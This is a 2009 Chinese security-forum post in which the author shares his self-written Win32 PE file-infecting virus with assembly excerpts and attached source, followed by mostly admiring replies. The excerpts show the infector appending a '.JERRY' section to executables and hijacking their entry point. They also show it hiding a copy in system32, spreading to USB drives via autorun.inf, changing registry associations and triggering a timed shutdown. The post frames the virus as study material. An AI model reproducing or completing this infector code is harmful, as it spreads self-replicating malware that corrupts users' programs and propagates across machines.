[原创]PE感染型病毒的研究和代码实现，附上代码和论文-付费问答-看雪-安全社区|安全招聘|kanxue.com

139

[旧帖] [原创]PE感染型病毒的研究和代码实现，附上代码和论文 0.00雪花

发表于: 2009-5-9 13:49 133955

[旧帖] [原创]PE感染型病毒的研究和代码实现，附上代码和论文 0.00雪花

jmpjerryy

2009-5-9 13:49

133955

我对安全相关的技术非常感兴趣，于是很早就定下了说在大学期间好好研究恶意代码技术，希望自己能做一个名副其实的无害的病毒。由于大学2年级才有了自己的电脑，入门太晚，还是太菜。花了近1年半才似懂非懂的做出了这个PE感染型病毒。已经毕业好几年了。偶然发现我的论文和代码居然在一些小网站售卖。不知道是哪个黑心的老师干的，加上自从看雪改版以来这里的气氛非常活跃。我就决定发到我长久景仰的看雪。
东西确实比较基础，发到初学者这里，但这一切是我在毫无恶意代码的知识和汇编知识的情况下花了一年多时间一点点啃出来的。请各位不要笑话。谢谢

大多的知识是吸取了guojpeng大牛的一篇paper，在此表示感谢。但由于代码只是片段。我加上了自己的很多东西，并调试通过编译。
程序并无大的破坏，只是修改了几个注册表键值和定时发作关机。也并未常驻内存，只是感染了C目录下的winrar.exe

这个程序分5个模块

核心代码
    lea edi,[ebp+aGetModuleHandle]        ;EDI指向API函数地址存放位置        lea esi,[ebp+lpApiAddrs]              ;ESI指向API函数名字串偏移地址Loop_Get_API:    
    lodsd                             ;EAX,DS:ESI
    cmp eax,0
    jz End_Get_API 
    add eax,ebp
    push eax                          ;第一次EAX中放着GetModuleHandleA函数名字串的真实位置
    push dword ptr [ebp+k32Base]        ;kernel32.dll基地址
    call GetAPIAdd                    ;SearchAPI.asm中过程GetAPIA proto :DWORD,:DWORD
    stosd
    jmp Loop_Get_API                ;获得API地址,参见SearchAPI.asm文件
End_Get_API:

核心代码
cmp word ptr [esi],'ZM'                               ;PE文件判断第一步
jne CouldNotInfect
cmp word ptr [esi],'EP'                               ;PE文件判断第二步 
jne CouldNotInfect 
cmp dword ptr [esi+8],'JERR'                          ;文件是否已经感染
je Loop_Get_Path               ;如果已经感染过了，试图感染下一个指定文件
……
mov [ebp+pe_Header],esi                               ;保存pe_Header指针 
mov ecx,[esi+74h]                                     ;得到directory的数目 
imul ecx,ecx,8 
lea eax,[ecx+esi+78h]                                 ;eax=data directory结束地址=节表起始地址 
movzx ecx,word ptr [esi+6h]                           ;节数目 
imul ecx,ecx,28h                                      ;得到所有节表的大小 
add eax,ecx                                           ;节结尾
xchg eax,esi               ;eax->Pe_header,esi->最后节开始偏移(即病毒节开始处)
;----------以上得到了新节的起始地址，以下是利用起始对病毒节的操作------------
mov dword ptr [esi],'REJ.'                              ;节名.JERRY 
mov dword ptr [esi+8],VirusLen                          ;节的实际大小
……
mov dword ptr [esi+10h],eax                           ;保存节对齐文件后的大小
mov eax,[esi-40+14h] 
add eax,[esi-40+10h] 
mov [esi+14h],eax                                     ;PointerToRawData更新 
mov [ebp+oldEnd],eax                     ;病毒代码往HOST文件中的写入点 
mov eax,[ebp+pe_Header] 
inc word ptr [eax+6h]                                 ;更新节数目 
mov ebx,[eax+28h]                                     ;eip指针偏移 
 
mov [ebp+oldEip],ebx                                  ;保存老指针 
mov ebx,[ebp+newEip]                         ;使HOST程序首先执行病毒程序 
mov [eax+28h],ebx                                     ;更新指针值 
mov ebx,[eax+50h]                                     ;更新ImageSize 
add ebx,VirusLen
……
mov [eax+50h],ebx ;确保更新后的Image_Size大小=(原Image_size+病毒长度)对齐后的长度 
mov dword ptr [eax+8],'JERR'     ;病毒感染标志直接写到被感染文件的PE头中
cld
mov ecx,VirusLen
mov edi,[ebp+oldEnd]
add edi,[ebp+pMem]
lea esi,[ebp+vBegin]
rep movsb                        ;将病毒代码写入目标文件新建的节中!
……
push [ebp+hFile] 
call [ebp+aSetFilePointer]                            ;设定文件读写指针
push [ebp+hFile] 
call [ebp+aSetEndOfFile]                       ; 将当前文件位置设为文件末尾

核心代码
call [ebp+aLoadLibrary]                  ;导入advapi32.dll链接库
mov ebx,eax
lea edx,[ebp+sRegOpenKeyExA] 
push edx 
push ebx 
call [ebp+aGetProcAddress]               ;获取RegOpenKeyExA函数的地址
……
call [ebp+aRegOpenKeyExA]             ;修改注册表与NOTEPAD.EXE关联
……
call [ebp+aRegSetValueExA]
……
push FALSE
lea eax,[ebp+destinationaddr]
push eax
lea eax,[ebp+sourceaddr]
push eax
call [ebp+aCopyFileA]    ;把JERRY.EXE拷贝到C:WINDOWS\system32\JERRY.EXE
;-------------------------------
push FILE_ATTRIBUTE_SYSTEM+FILE_ATTRIBUTE_HIDDEN
lea  eax,[ebp+destinationaddr]
push eax
call [ebp+aSetFileAttributes]
……
call [ebp+aGetDriveTypeA]                  ;取得U盘的盘符
cmp eax,DRIVE_REMOVABLE
……
call [ebp+aCopyFileA]         ;拷贝文件\system32\JERRY.exe到#:\JERRY.EXE
……
push FILE_ATTRIBUTE_SYSTEM+FILE_ATTRIBUTE_HIDDEN
……
push GENERIC_READ+GENERIC_WRITE
call [ebp+aCreateFile]                    ;生成空#:\autorun.inf
……
call [ebp+aWriteFile]                    ;为anturun.inf写入内容
……

核心代码
call [ebp+aLoadLibrary]                          ;导入user32.dll链接库
mov ebx,eax 
lea edx,[ebp+sMessageBoxA] 
push edx 
push eax 
call [ebp+aGetProcAddress]                       ;获取MessageBoxA函数的地址
……
lea eax,[ebp+Time]                             ;23：20-23：59分之间发作
push eax
call [ebp+aGetSystemTime]
cmp [ebp+Time].wHour,0Fh
jnz No_Infect
cmp [ebp+Time].wMinute,3Bh
ja No_Infect
cmp [ebp+Time].wMinute,14h
jb No_Infect
……
push 0 
call [ebp+aMessageBoxA]
……
push SW_SHOW
lea eax,[ebp+shutdown]
push eax
call [ebp+aWinExec] 

病毒程序主模块-JERRY.ASM

病毒程序搜索API函数模块-SearchAPI.ASM

病毒程序感染EXE文件模块-Modify_PE.ASM

登录后可查看完整内容

[注意]看雪招聘，专注安全领域的专业人才平台！

上传的附件：

复件 jerry.rar （10.81kb，903次下载）
Win32平台下的PE文件病毒的研究及实现.rar （281.91kb，1015次下载）
jerry.JPG （33.53kb，4207次下载）
searchapi.JPG （30.79kb，4184次下载）
modifype.JPG （38.76kb，4175次下载）
effectu.JPG （22.68kb，4178次下载）
burst.JPG （15.76kb，4183次下载）

收藏・139

免费・9

支持

赞赏记录

参与人

雪币

留言

时间

Youlor

为你点赞~

2024-2-4 02:09

伟叔叔

为你点赞~

2024-1-4 00:57

QinBeast

为你点赞~

2023-11-2 00:30

PLEBFE

为你点赞~

2023-9-23 00:26

shinratensei

为你点赞~

2023-9-19 00:36

心游尘世外

为你点赞~

2023-9-8 01:14

飘零丶

为你点赞~

2023-8-29 03:38

一半人生

为你点赞~

2020-6-4 19:15

阿伪

为你点赞~

2020-5-5 20:55

最新回复 (176) 1 2 3 4 5 6 7 8 ▶
zhangshuo 雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 23 粉丝 0 关注私信	zhangshuo 2 楼图不错有助消化 2009-5-9 13:55 0
billstone 雪币： 339 活跃值： (10) 能力值： ( LV9，RANK：260 ) 在线值：发帖 12 回帖 190 粉丝 0 关注私信	billstone 6 3 楼不错，不错，收藏了 2009-5-9 16:10 0
xxymg 雪币： 104 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 19 粉丝 0 关注私信	xxymg 4 楼貌似在第一页 2009-5-9 18:17 0
stalker 雪币： 399 活跃值： (38) 能力值： (RANK：350 ) 在线值：发帖 70 回帖 1064 粉丝 4 关注私信	stalker 8 5 楼我想知道楼主的图片是用什么工具制作的？一看就是专业人士 2009-5-9 18:32 0
aiie 雪币： 223 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 51 粉丝 0 关注私信	aiie 6 楼偶然发现我的论文和代码居然在一些小网站售卖。不知道是哪个黑心的老师干的世風日下..... 2009-5-9 19:44 0
zxhree 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 26 粉丝 0 关注私信	zxhree 7 楼谢谢了，写得太好了！！！ 2009-5-9 21:02 0
iawen 雪币： 359 活跃值： (450) 能力值： ( LV9，RANK：150 ) 在线值：发帖 11 回帖 174 粉丝 1 关注私信	iawen 3 8 楼不错的东西,下载收藏! 支持一下 2009-5-9 21:06 0
谪仙雪币： 54 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 11 粉丝 1 关注私信	谪仙 9 楼楼主在大学里确实所学不少,呵呵至于大学老师,素质那就难说了良莠不齐 2009-5-9 23:01 0
edongxu 雪币： 204 活跃值： (76) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 14 粉丝 1 关注私信	edongxu 10 楼好好学习了，对于我这个业余的人来说，要花功夫了 2009-5-9 23:04 0
liangdong 雪币： 1407 活跃值： (17) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 228 粉丝 0 关注私信	liangdong 11 楼进来学习非常感谢楼主的分享 2009-5-9 23:07 0
yingyue 雪币： 1844 活跃值： (35) 能力值： ( LV3，RANK：30 ) 在线值：发帖 16 回帖 2595 粉丝 3 关注私信	yingyue 12 楼收藏了。。。。。。。。。。。。。。。。。。。。。。。 2009-5-10 09:29 0
solu 雪币： 206 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 21 粉丝 0 关注私信	solu 13 楼向楼主的学习精神学习！ 2009-5-10 10:41 0
cvcvxk 雪币： 8833 活跃值： (2419) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 243 关注私信	cvcvxk 10 14 楼非常不错，有机会进优秀论文 2009-5-10 14:06 0
wsxcn 雪币： 336 活跃值： (10) 能力值： ( LV8，RANK：130 ) 在线值：发帖 4 回帖 27 粉丝 0 关注私信	wsxcn 3 15 楼看了你的文章，受到很大启发 2009-5-11 10:00 0
mkamao 雪币： 206 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 31 粉丝 0 关注私信	mkamao 16 楼 thank you 2009-5-11 10:18 0
lgccaa 雪币： 232 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 32 粉丝 0 关注私信	lgccaa 17 楼收藏，谢谢 2009-5-11 11:00 0
cnhnyu 雪币： 387 活跃值： (25) 能力值： ( LV7，RANK：100 ) 在线值：发帖 17 回帖 185 粉丝 0 关注私信	cnhnyu 2 18 楼 very good, very powerful ! 2009-5-11 13:21 0
ghi 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	ghi 19 楼向楼主学习我现在还在大学期间在抓紧时间多学东西这篇论文无论如何得好好研究下谢谢lz 2009-5-11 14:19 0
静慕者雪币： 144 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 195 粉丝 0 关注私信	静慕者 20 楼恩~~不错~处理文件时和壳的原理基本相似~传播途径值得学习~~不过~就是好像目前的杀毒软件会把ope在最后的当成病毒处理，我写的壳就遇到这样的问题~头疼 2009-5-11 16:40 0
jasonnbfan 雪币： 949 活跃值： (18) 能力值： ( LV9，RANK：330 ) 在线值：发帖 60 回帖 265 粉丝 2 关注私信	jasonnbfan 8 21 楼这篇文章不顶不行，下来仔细学习学习。 2009-5-11 21:46 0
peipeilulu 雪币： 206 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 56 粉丝 0 关注私信	peipeilulu 22 楼下载下来学习一下！ 2009-5-11 22:22 0
七号雪币： 199 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 89 粉丝 0 关注私信	七号 23 楼来学习的。。。 2009-5-12 12:16 0
daienming 雪币： 211 活跃值： (356) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 97 粉丝 0 关注私信	daienming 24 楼我是来学习的,visio图画的不错。 2009-5-12 13:08 0
清风小子雪币： 213 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 83 粉丝 0 关注私信	清风小子 25 楼很好很强大！！！！！！！！ 2009-5-12 21:29 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

jmpjerryy

发帖

122

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (176) 1 2 3 4 5 6 7 8 ▶
zhangshuo 雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 23 粉丝 0 关注私信	zhangshuo 2 楼图不错有助消化 2009-5-9 13:55 0
billstone 雪币： 339 活跃值： (10) 能力值： ( LV9，RANK：260 ) 在线值：发帖 12 回帖 190 粉丝 0 关注私信	billstone 6 3 楼不错，不错，收藏了 2009-5-9 16:10 0
xxymg 雪币： 104 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 19 粉丝 0 关注私信	xxymg 4 楼貌似在第一页 2009-5-9 18:17 0
stalker 雪币： 399 活跃值： (38) 能力值： (RANK：350 ) 在线值：发帖 70 回帖 1064 粉丝 4 关注私信	stalker 8 5 楼我想知道楼主的图片是用什么工具制作的？一看就是专业人士 2009-5-9 18:32 0
aiie 雪币： 223 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 51 粉丝 0 关注私信	aiie 6 楼偶然发现我的论文和代码居然在一些小网站售卖。不知道是哪个黑心的老师干的世風日下..... 2009-5-9 19:44 0
zxhree 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 26 粉丝 0 关注私信	zxhree 7 楼谢谢了，写得太好了！！！ 2009-5-9 21:02 0
iawen 雪币： 359 活跃值： (450) 能力值： ( LV9，RANK：150 ) 在线值：发帖 11 回帖 174 粉丝 1 关注私信	iawen 3 8 楼不错的东西,下载收藏! 支持一下 2009-5-9 21:06 0
谪仙雪币： 54 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 11 粉丝 1 关注私信	谪仙 9 楼楼主在大学里确实所学不少,呵呵至于大学老师,素质那就难说了良莠不齐 2009-5-9 23:01 0
edongxu 雪币： 204 活跃值： (76) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 14 粉丝 1 关注私信	edongxu 10 楼好好学习了，对于我这个业余的人来说，要花功夫了 2009-5-9 23:04 0
liangdong 雪币： 1407 活跃值： (17) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 228 粉丝 0 关注私信	liangdong 11 楼进来学习非常感谢楼主的分享 2009-5-9 23:07 0
yingyue 雪币： 1844 活跃值： (35) 能力值： ( LV3，RANK：30 ) 在线值：发帖 16 回帖 2595 粉丝 3 关注私信	yingyue 12 楼收藏了。。。。。。。。。。。。。。。。。。。。。。。 2009-5-10 09:29 0
solu 雪币： 206 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 21 粉丝 0 关注私信	solu 13 楼向楼主的学习精神学习！ 2009-5-10 10:41 0
cvcvxk 雪币： 8833 活跃值： (2419) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 243 关注私信	cvcvxk 10 14 楼非常不错，有机会进优秀论文 2009-5-10 14:06 0
wsxcn 雪币： 336 活跃值： (10) 能力值： ( LV8，RANK：130 ) 在线值：发帖 4 回帖 27 粉丝 0 关注私信	wsxcn 3 15 楼看了你的文章，受到很大启发 2009-5-11 10:00 0
mkamao 雪币： 206 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 31 粉丝 0 关注私信	mkamao 16 楼 thank you 2009-5-11 10:18 0
lgccaa 雪币： 232 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 32 粉丝 0 关注私信	lgccaa 17 楼收藏，谢谢 2009-5-11 11:00 0
cnhnyu 雪币： 387 活跃值： (25) 能力值： ( LV7，RANK：100 ) 在线值：发帖 17 回帖 185 粉丝 0 关注私信	cnhnyu 2 18 楼 very good, very powerful ! 2009-5-11 13:21 0
ghi 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	ghi 19 楼向楼主学习我现在还在大学期间在抓紧时间多学东西这篇论文无论如何得好好研究下谢谢lz 2009-5-11 14:19 0
静慕者雪币： 144 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 195 粉丝 0 关注私信	静慕者 20 楼恩~~不错~处理文件时和壳的原理基本相似~传播途径值得学习~~不过~就是好像目前的杀毒软件会把ope在最后的当成病毒处理，我写的壳就遇到这样的问题~头疼 2009-5-11 16:40 0
jasonnbfan 雪币： 949 活跃值： (18) 能力值： ( LV9，RANK：330 ) 在线值：发帖 60 回帖 265 粉丝 2 关注私信	jasonnbfan 8 21 楼这篇文章不顶不行，下来仔细学习学习。 2009-5-11 21:46 0
peipeilulu 雪币： 206 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 56 粉丝 0 关注私信	peipeilulu 22 楼下载下来学习一下！ 2009-5-11 22:22 0
七号雪币： 199 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 89 粉丝 0 关注私信	七号 23 楼来学习的。。。 2009-5-12 12:16 0
daienming 雪币： 211 活跃值： (356) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 97 粉丝 0 关注私信	daienming 24 楼我是来学习的,visio图画的不错。 2009-5-12 13:08 0
清风小子雪币： 213 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 83 粉丝 0 关注私信	清风小子 25 楼很好很强大！！！！！！！！ 2009-5-12 21:29 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[旧帖] [原创]PE感染型病毒的研究和代码实现，附上代码和论文 0.00雪花

账号登录 验证码登录

账号登录

验证码登录